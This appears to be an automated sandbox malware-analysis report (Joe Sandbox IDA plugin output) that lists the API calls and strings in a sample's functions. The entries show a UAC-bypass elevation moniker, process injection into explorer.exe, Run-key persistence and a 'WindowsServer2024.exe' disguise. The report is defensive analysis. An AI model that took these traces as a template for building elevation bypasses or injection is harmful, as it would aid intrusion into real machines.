                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                            • Instruction ID: dad6b1fc1b002f20fedd74e77e391273db258475079ac5c03f473837991d393a
                                                                            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                            • Instruction Fuzzy Hash: 35B18373D0B9F2058B36863F045823BEEA26E95B4532FC795DCD03F289C62AAD1595E0
                                                                            Function 007DAED9 Relevance: .3, Instructions: 310COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9616ce662cd67d5e7a25f75f22f646e532e03bafe99c2c4478e0c7084aee4a7f
                                                                            • Instruction ID: 6c5e6ee05ef502a9e9d484f96803a7e1bde87bf69451d2c3c3b74f88b57a1623
                                                                            • Opcode Fuzzy Hash: 9616ce662cd67d5e7a25f75f22f646e532e03bafe99c2c4478e0c7084aee4a7f
                                                                            • Instruction Fuzzy Hash: 24E15C71E0111DDBDF18CF9DD9919EEBBB2BF84308F14C259D422B7205D634AA52CB98
                                                                            Function 007D58B0 Relevance: 105.5, APIs: 47, Strings: 13, Instructions: 478stringregistrylibraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • wnsprintfW.SHLWAPI ref: 007D5A98
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5AB4
                                                                            • wnsprintfW.SHLWAPI ref: 007D5AE4
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B00
                                                                            • wnsprintfW.SHLWAPI ref: 007D5B30
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B4C
                                                                            • wnsprintfW.SHLWAPI ref: 007D5B7C
                                                                            • RegDeleteKeyExW.ADVAPI32(80000001,?,00000200,00000000), ref: 007D5B98
                                                                              • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D269B
                                                                              • Part of subcall function 007D2680: RegDeleteValueW.ADVAPI32(?,00836FC8,?,?,007C1109), ref: 007D26AE
                                                                              • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26B8
                                                                              • Part of subcall function 007D2680: RegOpenKeyW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,?), ref: 007D26D5
                                                                              • Part of subcall function 007D2680: RegDeleteValueW.KERNELBASE(?,{AB1F3E47-AEF1-400E-A108-233A046C3A34},?,?,007C1109), ref: 007D26E8
                                                                              • Part of subcall function 007D2680: RegCloseKey.ADVAPI32(?,?,?,007C1109), ref: 007D26F2
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,007D5BA8), ref: 007D317A
                                                                              • Part of subcall function 007D3160: SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D3196
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D31B7
                                                                              • Part of subcall function 007D3160: DeleteFileW.KERNEL32(00000000), ref: 007D31C3
                                                                              • Part of subcall function 007D3160: CoTaskMemFree.COMBASE(?), ref: 007D31CD
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D31D7
                                                                              • Part of subcall function 007D3160: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D31EA
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D31FF
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D3229
                                                                              • Part of subcall function 007D3160: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3238
                                                                              • Part of subcall function 007D3160: __snwprintf.LIBCMT ref: 007D3263
                                                                              • Part of subcall function 007D3160: DeleteFileW.KERNEL32(00000000), ref: 007D326F
                                                                              • Part of subcall function 007D3160: RemoveDirectoryW.KERNEL32(00000000), ref: 007D3279
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D3283
                                                                              • Part of subcall function 007D3160: LocalFree.KERNEL32(00000000), ref: 007D328D
                                                                              • Part of subcall function 007D3160: CoTaskMemFree.COMBASE(?), ref: 007D3297
                                                                              • Part of subcall function 007D2F20: OpenEventW.KERNEL32(00100002,00000000,{16B194B1-19CC-4C52-92E2-1BFAC8473D8C}), ref: 007D2F3F
                                                                              • Part of subcall function 007D2F20: SetEvent.KERNEL32(00000000), ref: 007D2F5B
                                                                              • Part of subcall function 007D2F20: CloseHandle.KERNEL32(00000000), ref: 007D2F68
                                                                              • Part of subcall function 007D2F20: OpenMutexW.KERNEL32(00100000,00000000,{8931AB7A-A1AA-4E58-80EA-2B1247F36722}), ref: 007D2F84
                                                                              • Part of subcall function 007D2F20: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 007D2FA2
                                                                              • Part of subcall function 007D2F20: CloseHandle.KERNEL32(00000000), ref: 007D2FAF
                                                                              • Part of subcall function 007D2F20: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2FC5
                                                                              • Part of subcall function 007D2F20: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D2FDA
                                                                              • Part of subcall function 007D2F20: __snwprintf.LIBCMT ref: 007D301F
                                                                              • Part of subcall function 007D2F20: lstrlenW.KERNEL32(00000000), ref: 007D302E
                                                                              • Part of subcall function 007D2F20: _memset.LIBCMT ref: 007D306A
                                                                              • Part of subcall function 007D2F20: GetFileAttributesW.KERNEL32(00000000), ref: 007D30A5
                                                                              • Part of subcall function 007D2F20: LocalFree.KERNEL32(00000000), ref: 007D30F1
                                                                              • Part of subcall function 007D2F20: CoTaskMemFree.COMBASE(?), ref: 007D30FE
                                                                              • Part of subcall function 007D2E00: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D5BB2,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E13
                                                                              • Part of subcall function 007D2E00: LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E28
                                                                              • Part of subcall function 007D2E00: __snwprintf.LIBCMT ref: 007D2E61
                                                                              • Part of subcall function 007D2E00: lstrlenW.KERNEL32(00000000), ref: 007D2E6D
                                                                              • Part of subcall function 007D2E00: _memset.LIBCMT ref: 007D2E97
                                                                              • Part of subcall function 007D2E00: GetFileAttributesW.KERNEL32(00000000), ref: 007D2EC0
                                                                              • Part of subcall function 007D2E00: LocalFree.KERNEL32(00000000), ref: 007D2EFD
                                                                              • Part of subcall function 007D2E00: CoTaskMemFree.COMBASE(007D5BB2), ref: 007D2F07
                                                                              • Part of subcall function 007D2AB0: CoInitializeEx.COMBASE(00000000,00000000), ref: 007D2AE0
                                                                              • Part of subcall function 007D2AB0: CoUninitialize.COMBASE ref: 007D2DDD
                                                                              • Part of subcall function 007D0010: SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D6B10,00831178,007D6B10), ref: 007D0023
                                                                              • Part of subcall function 007D0010: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D0034
                                                                              • Part of subcall function 007D0010: wnsprintfW.SHLWAPI ref: 007D005F
                                                                              • Part of subcall function 007D0010: lstrlenW.KERNEL32(?), ref: 007D0070
                                                                              • Part of subcall function 007D0010: CoTaskMemFree.COMBASE(?), ref: 007D007F
                                                                            • _memset.LIBCMT ref: 007D5C2A
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007D5C65
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D5C82
                                                                            • LocalFree.KERNEL32(?), ref: 007D5CB1
                                                                            • _memset.LIBCMT ref: 007D5D09
                                                                            • __snwprintf.LIBCMT ref: 007D5D2E
                                                                            • _memset.LIBCMT ref: 007D5D4D
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007D5D61
                                                                            • _memset.LIBCMT ref: 007D5D86
                                                                            • __snwprintf.LIBCMT ref: 007D5DB1
                                                                            • __snwprintf.LIBCMT ref: 007D5DD5
                                                                            • _memset.LIBCMT ref: 007D5DF2
                                                                            • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000044,?), ref: 007D5E36
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D5E45
                                                                            • DuplicateHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000002), ref: 007D5E7D
                                                                            • GetCurrentProcess.KERNEL32 ref: 007D5E8C
                                                                            • DuplicateHandle.KERNEL32(?,00000228,?,00000000,00000000,00000001,00000002), ref: 007D5EC4
                                                                            • LoadLibraryW.KERNEL32(?), ref: 007D5EDA
                                                                            • _memset.LIBCMT ref: 007D5EFE
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 007D5F14
                                                                            • GetProcAddress.KERNEL32(?,?), ref: 007D5F2E
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5F48
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F5C
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F70
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F84
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5F98
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5FAC
                                                                            • lstrcpyA.KERNEL32(?,?), ref: 007D5FBD
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5FD1
                                                                            • lstrcpyW.KERNEL32(?,?), ref: 007D5FE5
                                                                            • LocalFree.KERNEL32(?), ref: 007D6079
                                                                            • CloseHandle.KERNEL32(?), ref: 007D609A
                                                                            • CloseHandle.KERNEL32(?), ref: 007D60A7
                                                                            • TerminateProcess.KERNEL32(?,00000000), ref: 007D60BF
                                                                            • LocalFree.KERNEL32(?), ref: 007D60CC
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007D60DE
                                                                            • SetEvent.KERNEL32(00000000), ref: 007D60FA
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6107
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$lstrcpy$Delete__snwprintf_memset$CloseHandle$AllocFile$FolderKnownOpenPathTaskwnsprintf$EventProcesslstrlen$Attributes$AddressCurrentDirectoryDuplicateProcValue$CreateInitializeLibraryLoadMutexObjectOperationRemoveSingleTerminateUninitializeWaitWindows
                                                                            • String ID: %s%s$D$SOFTWARE\%s$Software\%s$Software\%s$Software\%s$WindowsServer2024$WindowsServer2024.exe${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${70F925A9-13A6-49C0-913B-C685A8E9B495}${C2AC4D96-85E6-4EFA-B33C-9FC0845F6FAD}${D4D7F2EA-38C9-468B-BF0E-B76E00A488F0}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 113497637-1127096856
                                                                            • Opcode ID: 0926fdc78ce09d5d05287994c43e2c4e8df4ac80c3cde2cb7d2275031a35aa4b
                                                                            • Instruction ID: c420f9e1b1dd44c3415207670782ec1b76badbae725b839b13695067fc65a9fa
                                                                            • Opcode Fuzzy Hash: 0926fdc78ce09d5d05287994c43e2c4e8df4ac80c3cde2cb7d2275031a35aa4b
                                                                            • Instruction Fuzzy Hash: 09222DB1E012289BDB24DF60DD49FE9B778BB89700F0045D9F60DA6281EB795B84CF51
                                                                            Function 007C1C80 Relevance: 77.2, APIs: 29, Strings: 15, Instructions: 207stringlibraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,{F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}), ref: 007C1CA2
                                                                            • _memset.LIBCMT ref: 007C1CCC
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 007C1CE0
                                                                            • _memset.LIBCMT ref: 007C1D05
                                                                              • Part of subcall function 007DC1E0: GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,?,007C108E), ref: 007DC1EB
                                                                              • Part of subcall function 007DC1E0: GetProcAddress.KERNEL32(007C108E,IsWow64Process), ref: 007DC204
                                                                            • __snwprintf.LIBCMT ref: 007C1D2F
                                                                            • __snwprintf.LIBCMT ref: 007C1D51
                                                                            • _memset.LIBCMT ref: 007C1D70
                                                                            • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 007C1D84
                                                                            • LocalAlloc.KERNEL32(00000040,00000DF0), ref: 007C1DA3
                                                                            • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 007C1DC1
                                                                            • GetProcAddress.KERNEL32(?,LoadLibraryW), ref: 007C1DD9
                                                                            • GetProcAddress.KERNEL32(?,GetProcAddress), ref: 007C1DF3
                                                                            • lstrcpyW.KERNEL32(-000004B8,KERNEL32.DLL), ref: 007C1E14
                                                                            • lstrcpyW.KERNEL32(-00000580,OLE32.DLL), ref: 007C1E2B
                                                                            • lstrcpyW.KERNEL32(-00000648,00000000), ref: 007C1E42
                                                                            • lstrcpyW.KERNEL32(-00000850,{4042FD4A-C237-4861-80BD-1FA24BEF8CE4}), ref: 007C1E59
                                                                            • lstrcpyW.KERNEL32(-00000A58,?), ref: 007C1E73
                                                                            • lstrcpyA.KERNEL32(-00000C60,CoGetObject), ref: 007C1E8A
                                                                            • lstrcpyA.KERNEL32(-00000D28,CoInitialize), ref: 007C1EA2
                                                                            • lstrcpyA.KERNEL32(-00000D8C,IIDFromString), ref: 007C1EBA
                                                                            • lstrcpyA.KERNEL32(-00000CC4,ExitProcess), ref: 007C1ED1
                                                                            • lstrcpyW.KERNEL32(-00000008,{6EDD6D74-C007-4E75-B76A-E5740995E24C}), ref: 007C1EE6
                                                                            • lstrcpyW.KERNEL32(-00000260,Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}), ref: 007C1EFE
                                                                              • Part of subcall function 007CA1B0: GetCurrentProcess.KERNEL32 ref: 007CA1B9
                                                                              • Part of subcall function 007CA1B0: _memset.LIBCMT ref: 007CA1CA
                                                                              • Part of subcall function 007CA1B0: CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,?,00000044,007C2000), ref: 007CA21B
                                                                              • Part of subcall function 007CA1B0: NtCreateSection.NTDLL(00000000,00000006,00000000,?,00000004,08000000,00000000), ref: 007CA251
                                                                              • Part of subcall function 007CA1B0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,?,00000002,00000000,00000004), ref: 007CA285
                                                                              • Part of subcall function 007CA1B0: NtMapViewOfSection.NTDLL(00000000,00000000), ref: 007CA290
                                                                              • Part of subcall function 007CA1B0: _memmove.LIBCMT ref: 007CA2AF
                                                                            • WaitForSingleObject.KERNEL32(00000000,00001388), ref: 007C1F78
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 007C1FA9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C1FB6
                                                                            • CloseHandle.KERNEL32(?), ref: 007C1FC3
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C1FD9
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C1FE9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$Handle$Process_memset$AddressCloseCreateCurrentProc$DirectoryLocalModuleSection__snwprintf$AllocEventFreeObjectSingleTerminateViewWaitWindows_memmove
                                                                            • String ID: %s\SysWOW64\explorer.exe$%s\explorer.exe$CoGetObject$CoInitialize$Elevation:Administrator!new:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}$ExitProcess$GetProcAddress$IIDFromString$KERNEL32.DLL$KERNEL32.DLL$LoadLibraryW$OLE32.DLL${4042FD4A-C237-4861-80BD-1FA24BEF8CE4}${6EDD6D74-C007-4E75-B76A-E5740995E24C}${F6FB16F6-69D4-4502-9E85-2E5E52F61D5C}
                                                                            • API String ID: 326014250-3343339882
                                                                            • Opcode ID: 355d928985903fa7e3b493e6f5c2ff87237b5c8f1236bff7a262de7406b91668
                                                                            • Instruction ID: 9b5f19603ea33de50665f3bd7dc455fd7371e7a2ea192edad84409bc8f6512d5
                                                                            • Opcode Fuzzy Hash: 355d928985903fa7e3b493e6f5c2ff87237b5c8f1236bff7a262de7406b91668
                                                                            • Instruction Fuzzy Hash: 458165B1A41218ABE720DF64CC49FE97776BB88701F0044DCF609A7282DBB99E95CF54
                                                                            Function 007CC1F0 Relevance: 66.7, APIs: 29, Strings: 9, Instructions: 241memorystringprocessCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • setsockopt.WS2_32(?,0000FFFF,00000080,?,00000004), ref: 007CC267
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC2B2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC2E6
                                                                            • wnsprintfW.SHLWAPI ref: 007CC31C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC32C
                                                                            • lstrcpyW.KERNEL32(00000000,00000000), ref: 007CC353
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC379
                                                                            • lstrcpyW.KERNEL32(00000000,{427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}), ref: 007CC39E
                                                                            • CoInitializeEx.COMBASE(00000000,00000006), ref: 007CC405
                                                                            • ShellExecuteExW.SHELL32(<@@), ref: 007CC418
                                                                            • GetLastError.KERNEL32 ref: 007CC424
                                                                            • CoUninitialize.COMBASE ref: 007CC439
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CC47A
                                                                            • wnsprintfW.SHLWAPI ref: 007CC4B5
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CC4FC
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC51D
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC539
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC546
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC553
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC560
                                                                            • OpenEventW.KERNEL32(00100002,00000000,{54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}), ref: 007CC574
                                                                            • SetEvent.KERNEL32(00000000), ref: 007CC590
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007CC59D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5AA
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5B7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5C4
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CC5D1
                                                                            • shutdown.WS2_32(?,00000002), ref: 007CC5DD
                                                                            • closesocket.WS2_32(?), ref: 007CC5E7
                                                                              • Part of subcall function 007CB6D0: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007CB701
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB70C
                                                                              • Part of subcall function 007CB6D0: LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CB724
                                                                              • Part of subcall function 007CB6D0: __snwprintf.LIBCMT ref: 007CB74E
                                                                              • Part of subcall function 007CB6D0: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 007CB773
                                                                              • Part of subcall function 007CB6D0: GetLastError.KERNEL32 ref: 007CB77C
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB7FC
                                                                              • Part of subcall function 007CB6D0: LocalFree.KERNEL32(00000000), ref: 007CB806
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$AllocEvent$CreateErrorLast$CloseHandleOpenlstrcpywnsprintf$DirectoryExecuteFileInitializeProcessShellUninitialize__snwprintfclosesocketsetsockoptshutdown
                                                                            • String ID: "%s%s" %s$%s%s$<@@$@@$D$WindowsServer2024.exe${427F0CCF-AF45-4A71-8E02-4FC2A2D64E46}${54CAA26B-27FF-49A1-8FDD-9D7CEDCCA5CA}${F064C698-006D-4351-BA2C-625A53964F8D}
                                                                            • API String ID: 3249679174-2524385997
                                                                            • Opcode ID: 791efa8af9a31d04fad40b1d73c3db6cb43dd08137f627fc9713dbb1fbafa954
                                                                            • Instruction ID: cba3276ef45f94f57e8b3ba861bc9048bdfad1193a78f154f41ebe342a6eafcb
                                                                            • Opcode Fuzzy Hash: 791efa8af9a31d04fad40b1d73c3db6cb43dd08137f627fc9713dbb1fbafa954
                                                                            • Instruction Fuzzy Hash: 3DA11FB1900218DFEB24DBA4DC49FADBB75BB88701F108999F60DB7291DB785A84CF50
                                                                            Function 007D22D0 Relevance: 66.7, APIs: 29, Strings: 9, Instructions: 190memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D6AFB), ref: 007D22DD
                                                                            • SHGetKnownFolderPath.SHELL32(007F7BF0,00000000,00000000,?), ref: 007D22FD
                                                                            • __snwprintf.LIBCMT ref: 007D2322
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • LocalAlloc.KERNEL32(00000040,00000BB8), ref: 007D234F
                                                                            • __snprintf.LIBCMT ref: 007D237E
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,?), ref: 007D2396
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D23AB
                                                                            • __snwprintf.LIBCMT ref: 007D23D5
                                                                            • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 007D23E3
                                                                            • GetLastError.KERNEL32 ref: 007D23F2
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D240A
                                                                            • __snwprintf.LIBCMT ref: 007D2439
                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007D245B
                                                                            • WriteFile.KERNEL32(000000FF,00000000,?,00000000,00000000), ref: 007D2487
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D2499
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24C3
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D24CD
                                                                            • CoTaskMemFree.COMBASE(?), ref: 007D24D7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24E1
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24EB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D24F5
                                                                            • CloseHandle.KERNEL32(000000FF), ref: 007D250C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2516
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2520
